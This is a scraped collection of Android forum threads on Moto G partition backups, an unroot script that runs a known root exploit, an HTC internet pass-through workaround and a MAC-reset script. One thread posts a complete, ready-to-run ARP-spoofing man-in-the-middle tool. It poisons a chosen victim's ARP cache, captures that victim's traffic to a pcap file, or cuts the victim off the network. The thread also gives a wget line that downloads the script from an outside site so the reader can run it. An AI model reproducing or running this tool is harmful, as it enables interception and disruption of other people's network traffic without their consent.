Flashing Global GSM radio in US GSM Moto G? - Moto G Q&A, Help & Troubleshooting

Hi i bought the US GSM Moto G [XT1034] [AWS], and i was wondering if i flashed the Global GSM Radio (XT1032), would it brick my phone or would i be able to use those frequencies for 3g only available in the Global GSM version?

We don't know for sure yet.
I was looking into doing it the other way around, but I returned my 8GB XT1032 last Sunday with the intent of getting a 16GB XT1034 (the two only variants sold out here). I've still got the files and would be interested in looking at a dump of the XT1034 nonetheless. (I'll be in all likelihood getting the LTE Moto G announced earlier today instead.)
If you're interested in tinkering with this, keep reading. Here be dragons.
Boot the phone from recovery (even better if "fastboot boot" works with a completely stock device) and use ADB's port forwarding to make a full backup of your phone. The scripts below might help you out:
On the phone:
Code:
#!/bin/sh
# Reference: http://forum.xda-developers.com/showpost.php?p=29862574&postcount=1
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p1
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p2
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p3
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p4
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p5
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p6
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p7
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p8
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p9
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p10
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p11
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p12
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p13
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p14
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p15
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p16
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p17
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p18
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p19
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p20
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p21
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p22
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p23
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p24
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p25
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p26
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p27
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p28
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p29
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p30
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p31
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p32
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p33
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p34
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p35
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0p36
busybox nc -l -p 5555 -e cat /dev/block/mmcblk0rpmb
On your computer:
Code:
#!/bin/bash
# Reference: http://forum.xda-developers.com/showpost.php?p=29862574&postcount=1
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p1_modem.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p2_sbl1.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p3_DDR.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p4_aboot.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p5_rpm.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p6_tz.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p7_sdi.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p8_utags.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p9_logs.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p10_padA.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p11_abootBackup.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p12_rpmBackup.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p13_tzBackup.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p14_sdiBackup.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p15_utagsBackup.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p16_padB.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p17_modemst1.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p18_modemst2.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p19_hob.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p20_dhob.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p21_fsg.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p22_fsc.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p23_ssd.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p24_sp.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p25_cid.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p26_pds.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p27_logo.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p28_clogo.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p29_persist.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p30_misc.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p31_boot.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p32_recovery.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p33_cache.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p34_system.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p35_kpan.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0p36_userdata.img
read -s -t10 -p "Time buffer between transfers... [Enter] to skip."$'\n';
nc 127.0.0.1 5555 | pv -i 0.5 > mmcblk0rpmb.img
In Windows, make NV items backups with QPST and EFS Professional. Edit: IIRC the phone won't talk to either program unless you reboot to bootloader, press volume down to get BP Tools and then press volume up to activate that option. The phone will then boot as usual, but enable additional "devices" over USB.
Regards,
Darkshado

The LTE Moto G wouldn´t have this problem right? it would work like the global GSM model for what i have read.

Exactly, it's pentaband instead of tri-band HSPA.

Related

Unroot for linux

Heres a modded linux script based on the defyroot script to unroot your defy
Code:
#!/bin/bash
# execute as bash root_Defy.v2
# Following Bin4ry instructions
# Using http://c-skills.blogspot.com/2010/07/android-trickery.html exploit
# See http://intrepidusgroup.com/insight/2010/09/android-root-source-code-looking-at-the-c-skills/ for an explanation of the exploit
ADB="./adblinux"
if [ ! -e $ADB ] ; then
echo "adb not found! Cannot continue." ;
exit 1 ;
fi
chmod +x $ADB
if [ $(grep -ic 22b8 /etc/udev/rules.d/51-android.rules) -eq 0 ] ; then
echo "SUBSYSTEM=="usb", ATTRS{idVendor}==\"22b8\", MODE=\"0666\"" >> /etc/udev/rules.d/51-android.rules ;
fi
if [ $($ADB devices | grep -c device$) -ne 1 ] ; then
echo "Too many devices attached: exiting!" ;
exit 1;
fi
SERIALNO=`$ADB devices | grep device$ | cut -f1`
if [ $? -eq 0 ] ; then
echo "Found device $SERIALNO" ;
else
echo "Error searching device number!" ;
exit 1;
fi
for file in rageagainstthecage su Superuser.apk ; do
echo -n "Pushing $file: " ;
$ADB -s $SERIALNO push $file /data/local/tmp/$file ;
echo "done" ;
done
#$ADB -s $SERIALNO push rageagainstthecage /data/local/tmp/rageagainstthecage
#$ADB -s $SERIALNO push su /data/local/tmp/su
#$ADB -s $SERIALNO push Superuser.apk /data/local/tmp/Superuser.apk
echo -n "Making rageagainstthecage executable and executing it: "
$ADB -s $SERIALNO shell chmod 755 /data/local/tmp/rageagainstthecage
$ADB -s $SERIALNO shell /data/local/tmp/rageagainstthecage
echo "done"
echo "Waiting 15 sec for phone adbd to restart before continuing"
sleep 15
echo -n "Remounting filesystem in read-write mode: "
$ADB -s $SERIALNO shell mount -o remount,rw -t ext3 /dev/block/mmcblk1p21 /system
echo "done"
echo -n "Removing su command: "
$ADB -s $SERIALNO shell rm /system/bin/su
echo "done"
echo -n "Removing Superuser apk: "
$ADB -s $SERIALNO shell rm /system/app/Superuser.apk
echo "done"
exit 0
added to linux tools, thanks!
By editing the original I could ensure that only what was created in the original, was altered, although in theory you should be able to strip or add anyfiles you want in the same way.
Works for sure on fedora 15 and opensuse11.4 and any the original script works on.

[Q] Internet passthrough on Ubuntu

Hi guys,
I want to use my PC running on Ubuntu 12.04 64Bit to access the internet.
Usually in Windows i use the HTC tool.
my phone is not rooted.
thanks for help
??
39 views, 0 reply !!!!
Coz maybe the ones who viewed the thread didn't know a solution hence not answered
May be someone who uses Ubuntu world know...
Most of us user windows...
Sent from a Desire S waiting for Kernel 3. WAKE UP HTC!!!!
if u hv HTC sense on ur device, just tick the INTERNET PASS THROUGH option from the notification tab
and the system will do the rest
cheers
check out screenshot below
thanks for your replies
lynxnoon : yes I'v tried to do that, it will be connected to the PC but without internet connection.
ensure the adapters (esp the wired) are updated online and then try again.
Also ensure theres is pass through connection on ur fone and then try to browse with the in-built browser.
If all these still doesnt work then u have to find out if the internet service provider alllows tethering or the modem u r using.
cheers
Rabih-Sy said:
Hi guys,
I want to use my PC running on Ubuntu 12.04 64Bit to access the internet.
Usually in Windows i use the HTC tool.
my phone is not rooted.
thanks for help
Click to expand...
Click to collapse
When I connect my phone and choose internet passthrough, the phone chooses ip address in the 192.168.99.0/24. If yours creates a different subnet you will have to change below accordingly.
I hope this solves your problem.
Edit /etc/rc.local sudo nano /etc/rc.local and add the following:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE -s 192.168.99.0/24
iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
#forward all dns queries from usb0 to google's dns server
iptables -t nat -I PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to 8.8.8.8
then at terminal type:
sudo /etc/rc.local
that will get you connectivity, but it will be short lived because htc is stupid and will disconnect if it doesn't detect the winblows htc software crap.
So you will need to fake it out. Turns out the phone is listening for htc software on port 6000 for 00 02 00 00 hex.
first you have to find the ip address of your phone (if arp doesn't work or you get command not found, you probably need to sudo arp):
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
then you tell the phone that htc software is listening:
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
To make that automagic each time us a script. Call it htcfaker or whatever:
#!/bin/bash
while :; do
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
while [ -z $phoneip ]; do
sleep 15
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
done
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
while [ "$phoneip" != "" ]; do
sleep 15
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
done
done
Then in your startup applications, point to that script.
Hope it helps!
I'm using unrooted HTC Sensation XE and Ubuntu 12.04 64-Bits, with these scripts Internet Pass Through works beautifully!:laugh::good:
haz3lnut said:
When I connect my phone and choose internet passthrough, the phone chooses ip address in the 192.168.99.0/24. If yours creates a different subnet you will have to change below accordingly.
I hope this solves your problem.
Edit /etc/rc.local sudo nano /etc/rc.local and add the following:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE -s 192.168.99.0/24
iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
#forward all dns queries from usb0 to google's dns server
iptables -t nat -I PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to 8.8.8.8
then at terminal type:
sudo /etc/rc.local
that will get you connectivity, but it will be short lived because htc is stupid and will disconnect if it doesn't detect the winblows htc software crap.
So you will need to fake it out. Turns out the phone is listening for htc software on port 6000 for 00 02 00 00 hex.
first you have to find the ip address of your phone (if arp doesn't work or you get command not found, you probably need to sudo arp):
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
then you tell the phone that htc software is listening:
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
To make that automagic each time us a script. Call it htcfaker or whatever:
#!/bin/bash
while :; do
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
while [ -z $phoneip ]; do
sleep 15
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
done
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
while [ "$phoneip" != "" ]; do
sleep 15
phoneip=$(arp -n | grep usb0 | awk 'BEGIN {FS=" "} {print $1}')
done
done
Then in your startup applications, point to that script.
Hope it helps!
Click to expand...
Click to collapse
Did anyone experienced the problem that this stopped working after a day or so?
When I plug into the phone now it just wont give a ipv4 address therefore theres nothing to re-route through the pc?
Mine still working without any problem after 2 months. I can only suggest you to check 2 things:
Ensure your /etc/rc.local file is not changed due to any Ubuntu update
You have to run the "htcfaker" script in Terminal before plugging in your phone. Do not close this Terminal until you want to disconnect.
fruity12 said:
Did anyone experienced the problem that this stopped working after a day or so?
When I plug into the phone now it just wont give a ipv4 address therefore theres nothing to re-route through the pc?
Click to expand...
Click to collapse
iptables table 'nat' not found while running sudo /etc/rc.local script
ykkhern said:
Mine still working without any problem after 2 months. I can only suggest you to check 2 things:
Ensure your /etc/rc.local file is not changed due to any Ubuntu update
You have to run the "htcfaker" script in Terminal before plugging in your phone. Do not close this Terminal until you want to disconnect.
Click to expand...
Click to collapse
I have updated /etc/rc.local file but I'm getting below error what needs to be done? I'm newbie to Linux, neverthless tried to look into many forums but couldn't get it resolved.. Please help !!
Code:
[email protected]:~$ sudo /etc/rc.local
[sudo] password for anvyal:
iptables v1.4.18: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
Please let me know if any other info needs to be provided. Thanks in advance for your help !!
anvyal said:
I have updated /etc/rc.local file but I'm getting below error what needs to be done? I'm newbie to Linux, neverthless tried to look into many forums but couldn't get it resolved.. Please help !!
Code:
[email protected]:~$ sudo /etc/rc.local
[sudo] password for anvyal:
iptables v1.4.18: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
Please let me know if any other info needs to be provided. Thanks in advance for your help !!
Click to expand...
Click to collapse
Please check the following line in your /etc/rc.local:
iptables -A POSTROUTING -t nat -j MASQUERADE -s 192.168.99.0/24
You have to change the IP subnet (highlighted in red font above) to match your phone's IP address. If your phone use 192.168.1.2 for example, then you'll have to change the IP subnet to 192.168.1.0/24.
To find your phone's IP address, first connect your phone to your PC in USB Tethering mode. Then on your PC side open a Terminal and issue the command "arp" (without the quotes) which shall give you the IP address of your phone.
Good luck!:laugh:
Script update required for recent phones?
This script didn't work for me on my M8 - the Sync hex data seems to have grown, and just passing the \x00\x02\x00\x00 string caused the pass through to immediately disconnect with failure message "Either you do not have the latest version of HTC Sync Manager installed, or another phone is already using Internet pass-through on your PC".
Changing the line in the script as below fixes it:
Code:
echo -n -e "\x00\x02\x00\x00" | nc $phoneip 6000 > /dev/null
Code:
echo -n -e "\x00\x02\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00" | nc $phoneip 6000 > /dev/null
I got this from vc0528.tumblr.com/post/71168788542/simulate-htc-sync-manager-via-usb-on-linux-os, which also has the alternative Perl script, which works a treat too:
Code:
#!/usr/bin/perl
use IO::Socket::INET;
#6000/tcp open X11
do{
open IN,”/proc/net/arp”; @arp=<IN>; close IN;
@d=grep ! /00:00:00:00:00:00/,grep /0x2.*usb0/,@arp;
} until($d[0]);
$_=$d[0]; s/\ .*//; chomp; print “sock:\t$_\n”;
my $sock = IO::Socket::INET->new(PeerAddr => $_ , PeerPort => 6000, Type=>SOCK_STREAM, Proto=>”tcp”) or die “Can not create socket [email protected]\n”;
print $sock “\x00\x02\x00\x00”;
print $sock “\x00\x03\x00\x00”;
print $sock “\x00\x05\x00\x00”;
close $sock;
Finally, if it helps anyone, I was wanting to set up a wifi range extender and so my IPtables was:
Code:
-A FORWARD -i wlan1 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i usb0 -o wlan1 -j ACCEPT

[HOWTO] MITM ARPspoofing automatic script ARM/BASH

Hello everybody
Sorry by advance for my english, i'm french.
My main phone is broken so i have a old galaxy mini (android gingerbread ) for replacement... and i want to use this for some MiTM spoofing and information gathering but app play store are not compatible or buggy for me.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
The script work for me but maybe the method to get local IP/ IP GATEWAY will change for phone or android version
I post the script here maybe it way make idea for someone
So i use nmap ARM binary from nmap website ( nmap/nping ) to create a little script (182 lines) to automated MiTM it's very lightweight and easy to use.
Requirement
rooted phone
busybox
tcpdump
bash
Features
MiTM arp spoofing ( Restore original gateway mac after attack )
MiTM arp spoofing with tcpdump log data in pcap file ( Restore original gateway mac after attack )
Netcut replace mac gateway by another fake mac address
Installation binaries
Code:
mkdir -p /sdcard/opt
cd /sdcard/opt
#get binary from nmap website
wget "http://ftp.linux.hr/android/nmap/nmap-6.46-android-arm-bin.tar.bz2"
tar xvjf nmap-6.46-android-arm-bin.tar.bz2
#Installation to /system/xbin
cd nmap-6.46
mount -o remount,rw /system
cp -v bin/nmap /system/xbin
cp -v bin/nping /system/xbin
#Restore /system permission
mount -o ro,remount,ro /system
Tools mitm.bash
Copy the content below script to /sdcard/mitm.bash
And run bash /sdcard/mitm.bash and enjoy it
or copy from web with :
Code:
wget -q http://www.web-point-zero.fr/mitm.bash -O /sdcard/mitm.bash && (echo "All good run : bash /sdcard/mitm.bash" ) || (echo "Error to download file ")
Code:
#!/bin/bash
echo "*** Tools create by c0derz67 from forum.xda-developers.com ****";
echo -e "\n\n";
TMP_DIRECTORY="/sdcard/_nettools_$RANDOM"; # maybe change by our sdcard directory
MAIN_INTERFACE="wlan0" # change with your interface name
mkdir -p "$TMP_DIRECTORY" || (echo "Can't create $TMP_DIRECTORY";exit;);
cd $TMP_DIRECTORY || (echo "Can't chdir to $TMP_DIRECTORY";exit;);
trap "echo \"Bye bye :) remove $TMP_DIRECTORY\";rm -r $TMP_DIRECTORY;exit;" 0 1 2 3 15;
echo "[*] GET GATEWAY "
GATEWAY=$(ip route show | grep $MAIN_INTERFACE | grep -o -E "via.*dev" | cut -d ' ' -f2);
if [ $? -eq 0 ]; then
echo " -> GATEWAY IS $GATEWAY"
else
echo ERROR TO GET GATEWAY
exit;
fi
echo "[*] GET ADRESS "
MY_ADDRESS=$(ip route show | egrep -o "src .*"|cut -d ' ' -f2);
if [ $? -eq 0 ]; then
echo " -> MY_ADDRESS IS $GATEWAY"
else
echo ERROR TO GET GATEWAY
exit;
fi
echo "[*] Get Mac address : ";
MY_MAC=$(busybox ifconfig $MAIN_INTERFACE | grep -E -o "HWaddr .*"|cut -d ' ' -f2);
if [ -n "$MY_MAC" ]; then
echo " -> Mac address is : $MY_MAC"
else
echo "ENABLE TO GET mac ADDR"
exit;
fi;
GATEWAY_FIRST_PART_IP_1=$(echo $GATEWAY | cut -d '.' -f1);
GATEWAY_FIRST_PART_IP_2=$(echo $GATEWAY | cut -d '.' -f2);
GATEWAY_FIRST_PART_IP_3=$(echo $GATEWAY | cut -d '.' -f3);
GATEWAY_FIRST_PART_IP_4=$(echo $GATEWAY | cut -d '.' -f4);
MY_ADDRESS_FIRST_PART_IP_1=$(echo $MY_ADDRESS | cut -d '.' -f1);
MY_ADDRESS_FIRST_PART_IP_2=$(echo $MY_ADDRESS | cut -d '.' -f2);
MY_ADDRESS_FIRST_PART_IP_3=$(echo $MY_ADDRESS | cut -d '.' -f3);
MY_ADDRESS_FIRST_PART_IP_4=$(echo $MY_ADDRESS | cut -d '.' -f4);
SCAN_IP_RANGE="$MY_ADDRESS_FIRST_PART_IP_1.$MY_ADDRESS_FIRST_PART_IP_2.$MY_ADDRESS_FIRST_PART_IP_3.1-255";
echo "[*] Scan : $SCAN_IP_RANGE "
nmap -n -v -sP "$SCAN_IP_RANGE" | grep -v down
echo -e "\n\n"
echo "[*] DEVICE(S) connected to network : ";
echo -e "\n";
mkdir ip || (echo "Can't create IP";exit);
GATEWAY_MAC="";
counter=0;
arp -n -a | grep -v incomplete > ARP_RESULT.txt
already_set=0;
while((1));
do
i=0;
while read line;do
i=$(($i+1));
THIS_IP=$(echo $line | egrep -o "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" );
THIS_MAC=$(echo $line | egrep -o ".{2}:.{2}:.{2}:.{2}:.{2}:.{2}" )
if [ "$THIS_IP" = "$GATEWAY" ];then
GATEWAY_MAC=$THIS_MAC;
fi;
#echo "[$i] CURRENT MAC : $THIS_MAC ";
#echo "[$i] CURRENT IP : $THIS_IP"
echo "$i ) $THIS_IP ( $THIS_MAC ) "
if [ "$already_set" -eq 0 ]; then
mkdir $i;
echo $THIS_MAC > $i/MAC
echo $THIS_IP > $i/IP
fi;
done < ARP_RESULT.txt;
already_set=1;
echo -e "\n"
read -n 1 -p "[*] Select target ( 1-$i ) : " number_victim;
echo "";
if [ ! -d $number_victim ];then
echo "$number_victim is not a good target";
continue;
fi
TARGET_MAC=$(cat $number_victim/MAC );
TARGET_IP=$(cat $number_victim/IP );
echo -e "\n\n"
echo "[*] Select attack : ";
echo -e "\n"
echo "1) Arp Spoofing MITM (Catch and Redirect trafic to gateway) ";
echo "2) MITM and dump all trafic to /sdcard/dump.pcap (required tcpdump)";
echo "3) Netcut Arp Spoofing replace gateway mac to invalid mac ";
echo -e "\n"
read -n 1 -p "[*] Attack type : " number_attack;
case $number_attack in
1)
clear
echo "[*] Start 1) Arp Spoofing MITM (Catch and Redirect trafic to gateway)";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $MY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 99999 &
read -n 1
GET_PID=$!
echo -e "\n\n";
echo "********* STOP ATTACK *********";
kill -9 $GET_PID;
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
2)
clear
echo "[*] Start 2) MITM and dump all trafic to /sdcard/dump.pcap (required tcpdump)";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $MY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 99999 >log_nping.txt &
PID_nping=$!
sleep 5s;
echo "Let's see what nping say log_nping.txt : "
echo -e "\n\n";
cat log_nping.txt
echo -e "\n\n";
echo "[*] Arp spoofing (nping) running in background see $TMP_DIRECTORY/log_nping.txt for detail"
echo "[*] Running tcpdump exclude $MY_ADDRESS packet";
tcpdump -i $MAIN_INTERFACE -s0 -v -w /sdcard/dump.pcap &
PID_tcpdump=$!
read -n 1
echo "********* STOP ATTACK *********";
echo "[*] kill tcpdump"
kill $PID_tcpdump;
echo "[*] kill nping"
kill $PID_nping
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
3)
clear
echo "[*] Start 3) Netcut Arp Spoofing replace gateway mac to invalid mac";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac cc:cc:cc:cc:cc:cc --dest-mac $TARGET_MAC $TARGET_IP -c 99999 &
PID_nping=$!
read -n 1
echo "********* STOP ATTACK *********";
echo "[*] kill tcpdump"
kill $PID_tcpdump;
echo "[*] kill nping"
kill $PID_nping
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
esac
done;
done;
#ARP POISOING help
#nping --arp --arp-type ARP-reply --arp-sender-ip (GATEWAY IP) --arp-sender-mac (ATTACKER IP ) --dest-mac (MAC VICTIME) (IP VICTIM) -c 999999

reset mac address (tested on lineage os)

original: https://cafe.naver.com/dr1phone/70671
some of it has mac address like 82:82:FF:bla:bla
this may occur some problems using wifi
but this is not a rom's problem,
It is default value of your phone
(why they made it like this?)
you can fix it simply using this script(attached)
run as root using bash on twrp shell or terminal emulator
Code:
echo "* created by djdisodo! *"
echo "Mounting filesystems..."
echo "generating mac address"
export MAC=$(dd if=/dev/urandom bs=1024 count=1 2>/dev/null | md5sum | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1\2\3\4\5\6/')
echo "remounting /persist"
umount /persist
mount -t ext4 /dev/block/bootdevice/by-name/persist /persist
echo "new mac address: " $MAC
echo "removing old mac address"
rm -f /persist/wlan_mac.bin
echo "writing new mac address"
echo $MAC | echo -n -e $(tr -d '[:space:]' | sed 's/../\\x&/g') >> /persist/wlan_mac.bin
for i in $(seq 0 17)
do
echo -n '\0' >> /persist/wlan_mac.bin
done
echo "changing permissions"
chmod 644 /persist/wlan_mac.bin
echo "unmounting partition"
umount /persist
echo "done!"
exit 0
I wanted to make it to flashable zip
but i couldn't
someone will do?

How to Unpack Boot Image and remove LG RCT and Triton Lgv20 (Linux & root only)

STANDARD DISCLAIMER: I am not responsible for any damages caused to your phone. Use this guide at your own risk there is no warranty or guarantee.
I only know how to do this in Linux in the terminal. This has only been done on Stock Oreo 8.0, may not work on Nougat never tested. This mod will speed up your phone. We are going to remove a very small program "rctd" that's buried in the phones boot image file. Also there is an antivirus scanner burred in the boot image, it slows the phone down by scanning every file.
This guide is my notes on what I did to remove LG RCT from my H910 Lgv20. But you can use this guide to remove LG RCT from your Lgv20.
guide updated on 6-28-22
Requirements:
Root/Twrp
Lgv20
Stock Oreo 8.0
Linux
